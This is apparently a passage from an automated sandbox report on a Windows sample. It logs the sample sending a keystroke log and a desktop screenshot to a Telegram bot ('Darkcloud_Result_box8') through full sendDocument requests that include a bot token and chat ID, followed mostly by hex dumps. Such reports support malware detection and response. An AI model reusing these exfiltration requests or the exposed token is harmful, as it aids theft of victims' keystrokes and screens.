                                                                                      2024-11-25 12:41:23 UTC16355OUTData Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-25 12:41:23 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:23 UTC16355OUTData Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14
                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-25 12:41:23 UTC16355OUTData Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:23 UTC232OUTData Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-25 12:41:23 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:28 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 25 Nov 2024 12:41:28 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 600
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.650012149.154.167.2204434304C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-25 12:41:30 UTC558OUTPOST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 601
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-25 12:41:30 UTC601OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 55 4e 62 66 50 55 74 56 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 37 3a 34 31 3a 31 39 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 37 3a 34 31 3a 31 39 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 37 3a 34 31 3a 31 39 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataUNbfPUtV.txt"Content-Type: application/octet-stream[07:41:19]<<Program Manager>>[07:41:19]<<Program Manager>>[07:41:19]<<Program Mana
                                                                                      2024-11-25 12:41:31 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 25 Nov 2024 12:41:30 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 594
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-11-25 12:41:31 UTC594INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 35 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 36 35 30 36 38 30 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 61 72 6b 63 6c 6f 75 64 5f 52 65 73 75 6c 74 5f 62 6f 78 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 61 72 6b 63 6c 6f 75 64 5f 52 65 73 75 6c 74 5f 62 6f 78 38 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 31 31 35 38 35 30 36 38 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 68 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 6f 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 52 77 65 62 63 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":2544,"from":{"id":8165068013,"is_bot":true,"first_name":"Darkcloud_Result_box8","username":"Darkcloud_Result_box8_Bot"},"chat":{"id":6115850689,"first_name":"Chi","last_name":"Boy","username":"HRwebc","type":"private"},"d


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.650013149.154.167.2204434304C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-25 12:41:34 UTC562OUTPOST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-25 12:41:34 UTC16355OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 4a 4c 48 6f 53 79 51 46 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotJLHoSyQF.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-25 12:41:34 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:34 UTC16355OUTData Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00
                                                                                      Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-25 12:41:34 UTC16355OUTData Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:34 UTC16355OUTData Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-25 12:41:34 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:34 UTC16355OUTData Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14
                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-25 12:41:34 UTC16355OUTData Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:41:34 UTC232OUTData Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-25 12:41:34 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:1
                                                                                      Start time:07:39:29
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\wMy37vlfvz.exe"
                                                                                      Imagebase:0x400000
